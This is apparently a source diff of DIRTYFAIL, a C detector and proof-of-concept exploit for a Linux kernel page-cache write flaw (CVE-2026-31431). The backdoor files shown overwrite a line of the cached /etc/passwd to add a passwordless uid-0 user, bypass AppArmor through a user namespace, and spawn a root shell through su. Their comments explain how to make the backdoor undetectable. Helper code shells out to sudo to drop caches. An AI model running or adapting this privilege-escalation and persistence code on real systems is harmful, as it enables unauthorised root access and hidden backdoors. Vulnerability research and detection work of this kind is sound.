return DF_TEST_ERROR;
}
off_t line_off = (off_t)atoll(off_s);
size_t len = strlen(victim_s);
if (!apply_flips(line_off, target_s, victim_s, len)) { /* reverse direction */
return DF_EXPLOIT_FAIL;
}
return DF_EXPLOIT_OK;
}
/* ---- OUTER (init ns) — find_victim, save_state, fork bypass child --- */
df_result_t backdoor_install(bool do_shell)
{
log_step("Persistent backdoor — install");
/* Did we already install? Check via getpwnam. */
struct passwd *pw = getpwnam(NEW_USER);
if (pw && pw->pw_uid == 0) {
log_ok("'%s' already in /etc/passwd as uid 0", NEW_USER);
if (!do_shell) return DF_EXPLOIT_OK;
log_ok("invoking 'su - %s'", NEW_USER);
execlp("su", "su", "-", NEW_USER, (char *)NULL);
return DF_EXPLOIT_FAIL;
}
struct victim v;
memset(&v, 0, sizeof(v));
if (!find_victim(&v)) {
log_bad("no nologin victim line found in /etc/passwd");
return DF_TEST_ERROR;
}
log_step("victim line: '%s' at offset %lld (%zu bytes)",
v.name, (long long)v.line_off, v.line_len);
/* Build replacement, same length. */
size_t fixed_len = strlen(DF_PREFIX) + strlen(DF_SUFFIX);
if (v.line_len < fixed_len) {
log_bad("victim line too short (%zu) for dirtyfail replacement (need >= %zu)",
v.line_len, fixed_len);
return DF_TEST_ERROR;
}
size_t pad_len = v.line_len - fixed_len;
char target[512];
char *p = target;
memcpy(p, DF_PREFIX, strlen(DF_PREFIX)); p += strlen(DF_PREFIX);
memset(p, 'X', pad_len); p += pad_len;
memcpy(p, DF_SUFFIX, strlen(DF_SUFFIX)); p += strlen(DF_SUFFIX);
*p = '\0';
log_step("replacement: '%s'", target);
log_warn("about to length-match overwrite '%s' → '%s' (%zu bytes)",
v.name, NEW_USER, v.line_len);
log_warn("ON-DISK /etc/passwd is unchanged. State stashed at %s.", STATE_FILE);
if (!typed_confirm("DIRTYFAIL")) { log_bad("confirmation declined"); return DF_OK; }
if (!save_state(v.line_off, v.line, v.line_len)) return DF_TEST_ERROR;
/* Hand off to inner via env vars. */
char off_str[32];
snprintf(off_str, sizeof(off_str), "%lld", (long long)v.line_off);
setenv("DIRTYFAIL_INNER_MODE", "backdoor-install", 1);
setenv("DIRTYFAIL_LINE_OFF", off_str, 1);
setenv("DIRTYFAIL_VICTIM_LINE", v.line, 1);
setenv("DIRTYFAIL_TARGET_LINE", target, 1);
int rc = apparmor_bypass_fork_arm(0, NULL);
if (rc != DF_EXPLOIT_OK) {
log_bad("inner backdoor-install failed (exit=%d)", rc);
return DF_EXPLOIT_FAIL;
}
/* Verify in init ns */
if (!(pw = getpwnam(NEW_USER)) || pw->pw_uid != 0) {
log_bad("post-flip getpwnam(%s) doesn't show uid 0 — install failed",
NEW_USER);
return DF_EXPLOIT_FAIL;
}
log_ok("'%s' is now uid 0 in the page cache copy of /etc/passwd",
NEW_USER);
log_hint("state stashed at %s — run 'dirtyfail --cleanup-backdoor' to revert",
STATE_FILE);
if (!do_shell) return DF_EXPLOIT_OK;
log_ok("invoking 'su - %s' in init ns (PAM nullok → REAL ROOT)", NEW_USER);
execlp("su", "su", "-", NEW_USER, (char *)NULL);
log_bad("execlp: %s", strerror(errno));
return DF_EXPLOIT_FAIL;
}
df_result_t backdoor_cleanup(void)
{
log_step("Persistent backdoor — cleanup");
off_t line_off = 0;
char victim_line[512];
size_t victim_len = 0;
if (!load_state(&line_off, victim_line, sizeof(victim_line), &victim_len)) {
log_bad("no usable state file at %s", STATE_FILE);
return DF_TEST_ERROR;
}
log_step("restoring %zu bytes at offset %lld", victim_len, (long long)line_off);
/* Read CURRENT bytes (post-install) so we know what to flip back from. */
int fd = open("/etc/passwd", O_RDONLY);
if (fd < 0) { log_bad("open passwd: %s", strerror(errno)); return DF_TEST_ERROR; }
char cur[512];
if (pread(fd, cur, victim_len, line_off) != (ssize_t)victim_len) {
log_bad("pread: %s", strerror(errno));
close(fd); return DF_TEST_ERROR;
}
close(fd);
cur[victim_len] = '\0';
/* Hand off to inner. inner runs apply_flips(off, target=cur, victim=victim_line)
* to flip back from current state to original. */
char off_str[32];
snprintf(off_str, sizeof(off_str), "%lld", (long long)line_off);
setenv("DIRTYFAIL_INNER_MODE", "backdoor-cleanup", 1);
setenv("DIRTYFAIL_LINE_OFF", off_str, 1);
setenv("DIRTYFAIL_VICTIM_LINE", victim_line, 1);
setenv("DIRTYFAIL_TARGET_LINE", cur, 1);
int rc = apparmor_bypass_fork_arm(0, NULL);
if (rc != DF_EXPLOIT_OK) {
log_bad("inner backdoor-cleanup failed (exit=%d)", rc);
return DF_EXPLOIT_FAIL;
}
unlink(STATE_FILE);
log_ok("backdoor cleaned — line restored, state file removed");
#ifdef POSIX_FADV_DONTNEED
int e = open("/etc/passwd", O_RDONLY);
if (e >= 0) { posix_fadvise(e, 0, 0, POSIX_FADV_DONTNEED); close(e); }
#endif
return DF_OK;
}
+59
@@ -0,0 +1,59 @@
/*
* DIRTYFAIL — backdoor.h
*
* Persistent uid-0 backdoor in the /etc/passwd page cache.
*
* MORE INVASIVE than the UID-flip exploits in copyfail.c /
* dirtyfrag_esp.c / dirtyfrag_rxrpc.c. Where those modify the calling
* user's UID for one shell session, this mode inserts a brand-new
* passwordless uid-0 user "dirtyfail" by length-matched overwrite of
* an existing nologin/false/sync line. The substituted line stays in
* the page cache until eviction, so:
*
* ./dirtyfail --exploit-backdoor # install + drop into root
* exit # back to your normal shell
* su - dirtyfail # any user, any time → root
*
* The username "dirtyfail" is intentionally chosen to match this
* project — anyone auditing /etc/passwd will spot it immediately,
* which is the opposite of stealth-by-default. If you need an
* undetectable backdoor for an authorized red-team engagement,
* change NEW_USER in backdoor.c.
*
* The on-disk /etc/passwd is unchanged. State (LINE_OFF, original
* VICTIM_LINE) is persisted at /var/tmp/.dirtyfail.state so that
* `--cleanup-backdoor` can restore the original line byte-by-byte
* via the same 1-byte primitive.
*
* This mode requires the GCM single-byte primitive (`cfg_1byte_write`)
* to land arbitrary bytes at arbitrary offsets — the 4-byte authencesn
* primitive can't easily rewrite a 50-byte line that doesn't align
* to 4-byte boundaries.
*
* Technique credit: 0xdeadbeefnetwork/Copy_Fail2-Electric_Boogaloo
* (`run.sh`); reimplemented here as a single C function.
*/
#ifndef DIRTYFAIL_BACKDOOR_H
#define DIRTYFAIL_BACKDOOR_H
#include "common.h"
df_result_t backdoor_install(bool do_shell);
df_result_t backdoor_cleanup(void);
/* INNER variants — run inside the AA bypass userns. The inner reads
* the operation parameters from env vars set by the outer:
* DIRTYFAIL_INNER_MODE = backdoor-install | backdoor-cleanup
* DIRTYFAIL_LINE_OFF = byte offset of the victim line
* DIRTYFAIL_VICTIM_LINE = original /etc/passwd line bytes
* DIRTYFAIL_TARGET_LINE = replacement bytes (install) or the current
* page-cache bytes at that line (cleanup)
*/
df_result_t backdoor_install_inner(void);
df_result_t backdoor_cleanup_inner(void);
/* Used by --list-state. Returns true if a backdoor state file is present
* (and prints a summary), false if no usable file exists. Modifies no state. */
bool backdoor_list_state(void);
#endif
+362
@@ -0,0 +1,362 @@
/*
* DIRTYFAIL — common.c
*
* Tiny utility surface shared by the detectors and exploiters. Nothing
* here is CVE-specific — that lives in copyfail.c, dirtyfrag_esp.c and
* dirtyfrag_rxrpc.c.
*/
#include "common.h"
#include <ctype.h>
#include <fcntl.h>
#include <sched.h>
#include <sys/socket.h>
#include <sys/stat.h>
#include <sys/utsname.h>
#include <sys/wait.h>
#include <pwd.h>
#ifdef __linux__
#include <sys/syscall.h>
#endif
/* On glibc <sched.h>+_GNU_SOURCE provides these. macOS lacks them; we
* still want this file to parse under macOS clang for static analysis,
* so the unprivileged_userns_allowed body itself is platform-guarded. */
#ifndef CLONE_NEWUSER
#define CLONE_NEWUSER 0x10000000
#endif
bool dirtyfail_use_color = true;
bool dirtyfail_active_probes = false;
bool dirtyfail_no_revert = false;
bool dirtyfail_json = false;
static void vlog(FILE *out, const char *prefix, const char *color,
const char *fmt, va_list ap)
{
if (dirtyfail_use_color && color)
fprintf(out, "\033[%sm%s\033[0m ", color, prefix);
else
fprintf(out, "%s ", prefix);
vfprintf(out, fmt, ap);
fputc('\n', out);
/* Flush — when stdout is piped (e.g. through ssh, timeout, tee)
* the default fully-buffered mode hides log lines until either the
* process exits cleanly or 4 KiB accumulates. We log to follow
* progress; visibility wins over throughput here. */
fflush(out);
}
/* In --json mode, all log output goes to stderr so stdout stays a
* clean JSON document for downstream parsers. Outside --json mode,
* we keep the original split (info/progress to stdout, errors to
* stderr) for human readability. */
#define LOG_FN(name, prefix, color, default_stream) \
void name(const char *fmt, ...) { \
FILE *_s = dirtyfail_json ? stderr : (default_stream); \
va_list ap; va_start(ap, fmt); \
vlog(_s, prefix, color, fmt, ap); \
va_end(ap); \
}
LOG_FN(log_step, "[*]", "1;36", stdout) /* cyan */
LOG_FN(log_ok, "[+]", "1;32", stdout) /* green */
LOG_FN(log_bad, "[-]", "1;31", stderr) /* red */
LOG_FN(log_warn, "[!]", "1;33", stderr) /* yellow */
LOG_FN(log_hint, "[i]", "0;37", stdout) /* dim */
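/* Illustration only, not part of common.c: a minimal sketch of the
* stream selection that LOG_FN performs inline. The helper name
* pick_log_stream is hypothetical; it only restates the ternary in the
* macro so the --json routing rule can be checked in isolation. */

```c
#include <stdbool.h>
#include <stdio.h>

/* Hypothetical helper: in JSON mode every log line goes to stderr so that
 * stdout carries nothing but the JSON document. Otherwise the per-function
 * default (stdout for progress, stderr for errors) is kept. */
FILE *pick_log_stream(bool json_mode, FILE *default_stream)
{
    return json_mode ? stderr : default_stream;
}
```

/* With json_mode set, log_step() and log_bad() would both end up on
* stderr; without it, only log_bad() and log_warn() do. */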
/* ------------------------------------------------------------------ */
bool kernel_version(int *major, int *minor)
{
struct utsname u;
if (uname(&u) != 0) return false;
/* release looks like "6.12.0-124.49.1.el10_1.x86_64" — split on dots. */
char *dot1 = strchr(u.release, '.');
if (!dot1) return false;
*dot1 = '\0';
*major = atoi(u.release);
char *dot2 = strchr(dot1 + 1, '.');
if (dot2) *dot2 = '\0';
*minor = atoi(dot1 + 1);
return true;
}
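/* Illustration only: a sketch of the same major/minor parse on a
* caller-supplied string, so it can be exercised without uname(2). The
* name parse_release is hypothetical. Unlike kernel_version() above, it
* leaves the input untouched and rejects strings with no numeric
* "major.minor" prefix, which is an assumption about desired behavior
* rather than what common.c does. */

```c
#include <stdbool.h>
#include <stdio.h>

/* Hypothetical variant of kernel_version(): parse "MAJOR.MINOR..." from
 * `release` without modifying it. Outputs are written only on success. */
bool parse_release(const char *release, int *major, int *minor)
{
    int maj = 0, min = 0;

    if (!release || !major || !minor)
        return false;
    /* "%d.%d" consumes the two leading numbers and stops at whatever
     * follows the minor number (".0-124..." in a typical release). */
    if (sscanf(release, "%d.%d", &maj, &min) != 2)
        return false;
    *major = maj;
    *minor = min;
    return true;
}
```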
bool kmod_loaded(const char *name)
{
FILE *f = fopen("/proc/modules", "r");
if (!f) return false;
char line[512];
size_t nlen = strlen(name);
bool found = false;
while (fgets(line, sizeof(line), f)) {
if (strncmp(line, name, nlen) == 0 && line[nlen] == ' ') {
found = true;
break;
}
}
fclose(f);
return found;
}
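/* Illustration only: the per-line test from kmod_loaded() pulled out
* into a hypothetical helper, modules_line_matches. The trailing-space
* check is what stops "esp4" from matching an "esp4_offload" line. */

```c
#include <stdbool.h>
#include <string.h>

/* Hypothetical helper: true if `line` (one line of /proc/modules) starts
 * with exactly `name` followed by a space. A plain prefix match would
 * also accept longer module names that merely begin with `name`. */
bool modules_line_matches(const char *line, const char *name)
{
    size_t nlen = strlen(name);

    /* If the first nlen bytes match, line[nlen] is still inside the
     * string (it is at worst the terminating NUL). */
    return strncmp(line, name, nlen) == 0 && line[nlen] == ' ';
}
```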
/* Probe by spawning a child. Doing it inline would either succeed (and
* leave us in a fresh userns for the rest of the run, breaking later
* checks) or fail and leave errno polluted. The fork is cheap enough.
*
* We use syscall(SYS_unshare) rather than the libc wrapper so this
* compiles on toolchains where <sched.h> doesn't expose unshare(). */
bool unprivileged_userns_allowed(void)
{
#ifdef __linux__
pid_t pid = fork();
if (pid < 0) return false;
if (pid == 0) {
if (syscall(SYS_unshare, CLONE_NEWUSER) == 0) _exit(0);
_exit(1);
}
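int wstatus = 0;
/* If waitpid itself fails, wstatus stays 0 and would read as a clean
* exit; report "not allowed" instead. */
if (waitpid(pid, &wstatus, 0) != pid) return false;
return WIFEXITED(wstatus) && WEXITSTATUS(wstatus) == 0;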
#else
return false; /* macOS analysis path — never executed in production */
#endif
}
bool find_passwd_uid_field(const char *username,
off_t *uid_off, size_t *uid_len,
char *uid_str)
{
int fd = open("/etc/passwd", O_RDONLY);
if (fd < 0) return false;
struct stat st;
if (fstat(fd, &st) < 0) { close(fd); return false; }
char *buf = malloc(st.st_size + 1);
if (!buf) { close(fd); return false; }
ssize_t got = read(fd, buf, st.st_size);
close(fd);
if (got <= 0) { free(buf); return false; }
buf[got] = '\0';
bool found = false;
size_t ulen = strlen(username);
char *line = buf;
while (line < buf + got) {
if (strncmp(line, username, ulen) == 0 && line[ulen] == ':') {
/* user:x:UID:GID:... — skip 2 colons to land on UID start. */
char *p = line + ulen + 1;
char *colon = strchr(p, ':');
if (!colon) break;
char *uid_start = colon + 1;
char *uid_end = strchr(uid_start, ':');
if (!uid_end) break;
size_t len = uid_end - uid_start;
if (len >= 16) break;
*uid_off = uid_start - buf;
*uid_len = len;
memcpy(uid_str, uid_start, len);
uid_str[len] = '\0';
found = true;
break;
}
char *nl = strchr(line, '\n');
if (!nl) break;
line = nl + 1;
}
free(buf);
return found;
}
bool drop_caches(void)
{
int fd = open("/proc/sys/vm/drop_caches", O_WRONLY);
if (fd < 0) return false;
ssize_t n = write(fd, "3\n", 2);
close(fd);
return n == 2;
}
void hex_dump(const unsigned char *buf, size_t len)
{
for (size_t i = 0; i < len; i += 16) {
printf(" %04zx ", i);
for (size_t j = 0; j < 16; j++) {
if (i + j < len) printf("%02x ", buf[i + j]);
else printf(" ");
}
printf(" |");
for (size_t j = 0; j < 16 && i + j < len; j++) {
unsigned char c = buf[i + j];
putchar(isprint(c) ? c : '.');
}
printf("|\n");
}
}
/*
* authenc keyblob layout (see crypto/authenc.c::crypto_authenc_setkey):
*
* struct rtattr { __u16 rta_len; __u16 rta_type; } = 4 bytes
* __be32 enckeylen = 4 bytes
* authkey[authkeylen]
* enckey [enckeylen]
*
* rta_len in the rtattr counts the rtattr header *plus* the enckeylen
* field, so it is always 8.
*/
size_t build_authenc_keyblob(unsigned char *out,
const unsigned char *authkey, size_t authkeylen,
const unsigned char *enckey, size_t enckeylen)
{
/* struct rtattr { u16 rta_len; u16 rta_type; } */
out[0] = 8; out[1] = 0;
out[2] = CRYPTO_AUTHENC_KEYA_PARAM;
out[3] = 0;
/* __be32 enckeylen */
out[4] = (enckeylen >> 24) & 0xff;
out[5] = (enckeylen >> 16) & 0xff;
out[6] = (enckeylen >> 8) & 0xff;
out[7] = (enckeylen ) & 0xff;
memcpy(out + 8, authkey, authkeylen);
memcpy(out + 8 + authkeylen, enckey, enckeylen);
return 8 + authkeylen + enckeylen;
}
bool typed_confirm(const char *expected)
{
char buf[128];
printf(" Type \033[1;33m%s\033[0m and press enter to proceed: ", expected);
fflush(stdout);
if (!fgets(buf, sizeof(buf), stdin)) return false;
/* strip trailing newline */
size_t n = strlen(buf);
while (n > 0 && (buf[n-1] == '\n' || buf[n-1] == '\r')) buf[--n] = '\0';
return strcmp(buf, expected) == 0;
}
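/* Illustration only: the comparison step of typed_confirm() without
* the prompt or stdin, so the newline handling can be checked directly.
* The names strip_eol and line_matches are hypothetical. */

```c
#include <stdbool.h>
#include <string.h>

/* Hypothetical helper: remove any trailing '\n' / '\r' bytes in place. */
void strip_eol(char *s)
{
    size_t n = strlen(s);

    while (n > 0 && (s[n - 1] == '\n' || s[n - 1] == '\r'))
        s[--n] = '\0';
}

/* Hypothetical helper: exact, case-sensitive match after stripping the
 * line terminator. Modifies `line`. */
bool line_matches(char *line, const char *expected)
{
    strip_eol(line);
    return strcmp(line, expected) == 0;
}
```

/* The match is deliberately exact: a lowercase answer or one with extra
* characters is treated as a refusal. */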
static uid_t read_outer_id(const char *path)
{
int fd = open(path, O_RDONLY);
if (fd < 0) return (uid_t)-1;
char buf[256];
ssize_t n = read(fd, buf, sizeof(buf) - 1);
close(fd);
if (n <= 0) return (uid_t)-1;
buf[n] = '\0';
/* Format: "<inner> <outer> <count>". For init namespace, this is
* "0 0 4294967295" — outer == 0 == real root. For our userns it's
* "0 1000 1" — outer == 1000 == real uid. */
/* Unsigned conversions: the init-namespace count (4294967295) does not
* fit in an int. */
unsigned inner = 0, outer = 0, count = 0;
if (sscanf(buf, "%u %u %u", &inner, &outer, &count) != 3 || inner != 0)
return (uid_t)-1;
return (uid_t)outer;
}
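/* Illustration only: parsing one uid_map / gid_map line from a string
* rather than from /proc. The name parse_id_map_line is hypothetical.
* It assumes `unsigned` is at least 32 bits wide, which holds on the
* Linux targets this code is built for. */

```c
#include <stdbool.h>
#include <stdio.h>

/* Hypothetical helper: split "<inner> <outer> <count>" into its three
 * fields. Unsigned conversions are used because the init-namespace map
 * has a count of 4294967295. Returns false unless all three parse. */
bool parse_id_map_line(const char *line,
                       unsigned *inner, unsigned *outer, unsigned *count)
{
    return sscanf(line, "%u %u %u", inner, outer, count) == 3;
}
```

/* A single-entry map such as "0 1000 1" yields outer == 1000; the
* identity map of the init namespace yields outer == 0. */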
uid_t real_uid_for_target(void)
{
uid_t outer = read_outer_id("/proc/self/uid_map");
/* If we're root in the init namespace OR no userns — return getuid().
* The init namespace map shows "0 0 4294967295" → outer=0; only
* trust an outer != 0 (and != -1) as the bypass-userns case. */
if (outer == (uid_t)-1) return getuid();
if (outer == 0) return getuid();
return outer;
}
gid_t real_gid_for_target(void)
{
uid_t outer = read_outer_id("/proc/self/gid_map");
if (outer == (uid_t)-1) return getgid();
if (outer == 0) return getgid();
return (gid_t)outer;
}
/* Best-effort eviction of /etc/passwd from the page cache. Used by
* the --no-shell path to revert the page-cache modification after a
* successful exploit + verify.
*
* The naive `posix_fadvise(POSIX_FADV_DONTNEED)` is unreliable here:
* since Linux 6.3, fadvise requires write access to the file, and we
* typically don't have write access to /etc/passwd from inside the
* AA bypass userns (root in userns maps to overflow uid in init ns,
* which doesn't own the file).
*
* So we try in order:
* 1. posix_fadvise on a fresh O_RDONLY fd (best case)
* 2. drop_caches via `sudo -n` and the system shell. This only works
* when the user has passwordless sudo, which is common on test VMs
* but cannot be assumed elsewhere; without it this step fails.
*
* Returns true if at least one attempt reported success, false
* otherwise. A true result is not proof of eviction, because fadvise
* can return 0 without dropping the page (see the comment in the
* function body). Caller should treat false as "page cache may still be
* modified: tell the user to reboot if their session breaks". */
bool try_revert_passwd_page_cache(void)
{
bool ok = false;
#ifdef POSIX_FADV_DONTNEED
int fd = open("/etc/passwd", O_RDONLY);
if (fd >= 0) {
if (posix_fadvise(fd, 0, 0, POSIX_FADV_DONTNEED) == 0) ok = true;
close(fd);
}
#endif
/* Even if fadvise returned 0, modern kernels may silently no-op when
* we lack write access. Verifying would mean re-reading the file and
* comparing it against an O_DIRECT read of the on-disk copy, which is
* too fiddly here, so always try drop_caches as well (belt and
* suspenders). */
int rc = system("sudo -n /bin/sh -c 'echo 3 > /proc/sys/vm/drop_caches' "
">/dev/null 2>&1");
if (rc == 0) ok = true;
return ok;
}
bool ssh_lockout_check(const char *target_user)
{
const char *ssh_conn = getenv("SSH_CONNECTION");
if (!ssh_conn || !*ssh_conn) return true; /* not over SSH */
const char *user = getenv("USER");
if (!user) {
struct passwd *pw = getpwuid(real_uid_for_target());
user = pw ? pw->pw_name : "";
}
if (strcmp(user, target_user) != 0) return true; /* different user */
log_warn("=================================================================");
log_warn(" SSH LOCKOUT WARNING");
log_warn("=================================================================");
log_warn(" You are running this exploit OVER SSH against your OWN account.");
log_warn(" The page-cache write will mark '%s' as uid 0 in /etc/passwd.",
target_user);
log_warn(" Once that lands:");
log_warn(" - sshd looks up '%s', sees uid 0", target_user);
log_warn(" - StrictModes rejects ~/.ssh/authorized_keys (owner uid 1000");
log_warn(" != logging-in uid 0) → publickey auth fails");
log_warn(" - PAM password auth also fails (uid mismatch)");
log_warn(" Recovery requires console access to drop_caches or reboot.");
log_warn(" If this is what you want, type YES_BREAK_SSH below.");
log_warn(" Otherwise consider --exploit-backdoor (targets a nologin line");
log_warn(" instead of your account, doesn't break SSH).");
log_warn("=================================================================");
return typed_confirm("YES_BREAK_SSH");
}
int open_and_cache(const char *path)
{
int fd = open(path, O_RDONLY);
if (fd < 0) return -1;
/* Force a read so the page is in the cache. The exploit primitives
* all assume the target page is already populated. We don't care
* what the bytes are or whether read returns short — only that the
* kernel pulled the page into the cache as a side effect. */
char tmp[4096];
if (read(fd, tmp, sizeof(tmp)) < 0) {
/* primer failed; caller's splice will surface a useful errno. */
}
lseek(fd, 0, SEEK_SET);
return fd;
}
+197
@@ -0,0 +1,197 @@
/*
* DIRTYFAIL — common.h
*
* Shared declarations for the DIRTYFAIL detector + PoC binary.
*
* This file is intentionally light: AF_ALG / SOL_ALG constants that older
* libcs do not export, log functions that respect --no-color, and the
* type definitions used by every CVE module.
*/
#ifndef DIRTYFAIL_COMMON_H
#define DIRTYFAIL_COMMON_H
/* The Makefile passes -D_GNU_SOURCE on the command line; this guard
* keeps gcc from warning about a duplicate definition when callers
* include common.h after the cmdline -D has already taken effect. */
#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif
#include <errno.h>
#include <stdarg.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>
/* ------------------------------------------------------------------ *
* AF_ALG constants
*
* These are upstream in <linux/if_alg.h>, but plenty of distros ship
* stale headers. Declare locally so DIRTYFAIL builds on every target
* we have run it against (Ubuntu 22.04 → 24.04, RHEL 9/10, Fedora 42+).
* ------------------------------------------------------------------ */
#ifndef AF_ALG
#define AF_ALG 38
#endif
#ifndef SOL_ALG
#define SOL_ALG 279
#endif
#define ALG_SET_KEY 1
#define ALG_SET_IV 2
#define ALG_SET_OP 3
#define ALG_SET_AEAD_ASSOCLEN 4
#define ALG_SET_AEAD_AUTHSIZE 5
#define ALG_OP_DECRYPT 0
#define ALG_OP_ENCRYPT 1
#define CRYPTO_AUTHENC_KEYA_PARAM 1 /* rtattr type, <crypto/authenc.h> */
struct sockaddr_alg_compat {
unsigned short salg_family;
unsigned char salg_type[14];
unsigned int salg_feat;
unsigned int salg_mask;
unsigned char salg_name[64];
};
/* ------------------------------------------------------------------ *
* Logging
*
* DIRTYFAIL output is meant to be skim-readable by a researcher *and*
* grep-friendly in CI. We use a small set of fixed prefixes so that
* automation can match on lines without parsing color escapes:
*
* [*] step / status [+] good news / detection result
* [-] bad news [!] attention / VULNERABLE
* [i] hint [?] prompt
* ------------------------------------------------------------------ */
extern bool dirtyfail_use_color;
/* When true, --scan and --check-* modes do an active sentinel-file STORE
* probe per mode in addition to precondition checks. Set by --active. */
extern bool dirtyfail_active_probes;
/* When true, --no-shell mode skips the auto-revert step — the page-cache
* plant survives until --cleanup or drop_caches. Used by the
* container-escape demo to show that the corruption crosses namespace
* boundaries. Set by --no-revert. */
extern bool dirtyfail_no_revert;
/* When true, --scan emits a single JSON object on stdout (suitable for
* SIEM/fleet ingestion); all log output (banner, step/ok/bad/warn/hint)
* is redirected to stderr. Set by --json. */
extern bool dirtyfail_json;
void log_step (const char *fmt, ...) __attribute__((format(printf, 1, 2)));
void log_ok (const char *fmt, ...) __attribute__((format(printf, 1, 2)));
void log_bad (const char *fmt, ...) __attribute__((format(printf, 1, 2)));
void log_warn (const char *fmt, ...) __attribute__((format(printf, 1, 2)));
void log_hint (const char *fmt, ...) __attribute__((format(printf, 1, 2)));
/* ------------------------------------------------------------------ *
* Result codes returned by every detector / exploiter.
*
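* They map onto exit codes used by the top-level binary so that CI
* pipelines can branch on them without parsing stdout. The enum values
* are internal identifiers, not the exit codes themselves:
* DF_PRECOND_FAIL (4) and DF_EXPLOIT_OK (5) both map to exit 0.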
*
* DF_OK exit 0 not vulnerable
* DF_VULNERABLE exit 2 vulnerable (detector confirmed primitive)
* DF_PRECOND_FAIL exit 0 prerequisites missing → not vulnerable here
* DF_TEST_ERROR exit 1 could not determine
* DF_EXPLOIT_OK exit 0 exploit succeeded (root achieved)
* DF_EXPLOIT_FAIL exit 3 exploit attempted but did not land
*
* Detectors should never return DF_EXPLOIT_*; exploiters should never
* return DF_PRECOND_FAIL (they assume the detector ran first).
* ------------------------------------------------------------------ */
typedef enum {
DF_OK = 0,
DF_VULNERABLE = 2,
DF_PRECOND_FAIL = 4,
DF_TEST_ERROR = 1,
DF_EXPLOIT_OK = 5,
DF_EXPLOIT_FAIL = 3,
} df_result_t;
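/* Illustration only: the result-to-exit-code table above written as a
* function. The top-level binary is not shown in this header, so the
* name df_exit_code and the fallback for unknown values are
* assumptions; only the six mappings come from the table. */

```c
/* Copied from common.h so the sketch compiles on its own. */
typedef enum {
    DF_OK           = 0,
    DF_VULNERABLE   = 2,
    DF_PRECOND_FAIL = 4,
    DF_TEST_ERROR   = 1,
    DF_EXPLOIT_OK   = 5,
    DF_EXPLOIT_FAIL = 3,
} df_result_t;

/* Hypothetical helper: translate a result code into the process exit
 * status listed in the comment table. */
int df_exit_code(df_result_t r)
{
    switch (r) {
    case DF_OK:
    case DF_PRECOND_FAIL:
    case DF_EXPLOIT_OK:
        return 0;
    case DF_TEST_ERROR:
        return 1;
    case DF_VULNERABLE:
        return 2;
    case DF_EXPLOIT_FAIL:
        return 3;
    }
    return 1; /* assumption: unknown values count as "could not determine" */
}
```

/* A CI job can then treat exit 2 as "vulnerable" and exit 1 as
* "inconclusive" without reading any log output. */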
/* ------------------------------------------------------------------ *
* Utilities (common.c)
* ------------------------------------------------------------------ */
/* Parse uname(2)->release into (major, minor). Returns false on parse error. */
bool kernel_version(int *major, int *minor);
/* Read /proc/modules and return true if `name` is loaded. Returns false
* (and sets errno) if /proc/modules cannot be opened. */
bool kmod_loaded(const char *name);
/* Best-effort: can the calling user create a user namespace?
* forks a child that calls unshare(CLONE_NEWUSER) and reports back. */
bool unprivileged_userns_allowed(void);
/* Find the UID field of `username` in /etc/passwd.
* uid_off, uid_len: byte offset and string length of the UID field
* uid_str: caller-supplied buffer >= 16 bytes; receives the UID text
* Returns false if /etc/passwd cannot be read, the user is not found,
* or the UID field is 16 or more characters long. Callers that need a
* 4-digit UID must check uid_len themselves. */
bool find_passwd_uid_field(const char *username,
off_t *uid_off, size_t *uid_len,
char *uid_str);
/* Drop the kernel page cache. Requires root. */
bool drop_caches(void);
/* Best-effort eviction of /etc/passwd from page cache. Tries
* POSIX_FADV_DONTNEED, then `sudo drop_caches` as belt-and-suspenders.
* Returns true if at least one path succeeded. See common.c for
* caveats. */
bool try_revert_passwd_page_cache(void);
/* Print a hex+ASCII dump (max `len` bytes). For debug output. */
void hex_dump(const unsigned char *buf, size_t len);
/* Build the rtattr-prefixed authenc keyblob expected by ALG_SET_KEY for
* authencesn(hmac(sha256), cbc(aes)). `out` must be >= 8+authkeylen+enckeylen.
* Returns total bytes written. */
size_t build_authenc_keyblob(unsigned char *out,
const unsigned char *authkey, size_t authkeylen,
const unsigned char *enckey, size_t enckeylen);
/* Prompt the user to type the literal string `expected` and press enter.
* Returns true only on exact match. Used as a last-line gate before
* --exploit modifies real system state. */
bool typed_confirm(const char *expected);
/* Convenience: open `path` RO and return a freshly-cached fd.
* The page-cache primitives below all assume the page is hot. */
int open_and_cache(const char *path);
/* Return the user's real (outer) uid, defeating the userns illusion.
*
* After the AppArmor bypass enters us into a fresh user namespace with
* uid_map "0 <real_uid> 1", `getuid()` returns 0 inside the namespace —
* which lies to exploit code that wants to know which user account to
* target in /etc/passwd. This helper reads /proc/self/uid_map; if it
* shows a non-identity mapping like "0 1000 1", returns the outer uid
* (1000). Otherwise (init namespace, or no userns at all) returns
* `getuid()`.
*
* Same idea for real_gid_for_target. */
uid_t real_uid_for_target(void);
gid_t real_gid_for_target(void);
/* If $SSH_CONNECTION is set AND `target_user` is the SSH login user,
* the user-uid-flip exploits about to fire will lock the operator out
* of SSH (sshd reads modified /etc/passwd, sees uid 0, then StrictModes
* rejects ~/.ssh/authorized_keys because file owner != logging-in uid).
* The lockout persists until the page cache is evicted — typically only
* a reboot recovers, since drop_caches needs root.
*
* Emit a loud warning and require an extra typed_confirm("YES_BREAK_SSH").
* Returns true to proceed, false to abort. Always returns true when not
* over SSH or when the target user differs from $USER. */
bool ssh_lockout_check(const char *target_user);
#endif /* DIRTYFAIL_COMMON_H */
+451
@@ -0,0 +1,451 @@
/*
* DIRTYFAIL — copyfail.c — CVE-2026-31431 ("Copy Fail")
*
* Detector + opt-in PoC.
*
* BACKGROUND
* ----------
* The Linux kernel's authencesn(hmac(sha256), cbc(aes)) AEAD template
* performs a 4-byte "scratch" copy at the end of its destination
* scatterlist as part of moving the ESN sequence-number high bits
* around. The crypto code assumes src and dst point at kernel-private
* memory. They do — except when the AF_ALG socket family is used:
* algif_aead lets userspace splice() pages into the request, and the
* AEAD primitive runs in-place. By splicing a page-cache page from a
* readable file into the request, the scratch write lands in that page
* cache. The on-disk file is untouched, but the kernel (and every
* subsequent reader) sees the modified copy until the page is evicted.
*
* The 4 bytes that get written are bytes 4..7 of the AAD ("seqno_lo"
* in the ESP header layout), which userspace controls directly. Net
* result: an unprivileged 4-byte arbitrary-offset write into any
* world-readable file's page cache.
*
* DETECTION STRATEGY
* ------------------
* We never touch system files in detection. Instead we:
* 1. Confirm AF_ALG + authencesn(...) can be instantiated.
* 2. Create a sentinel file in $TMPDIR and fault its first page in.
* 3. Run the exact primitive against the sentinel file with a
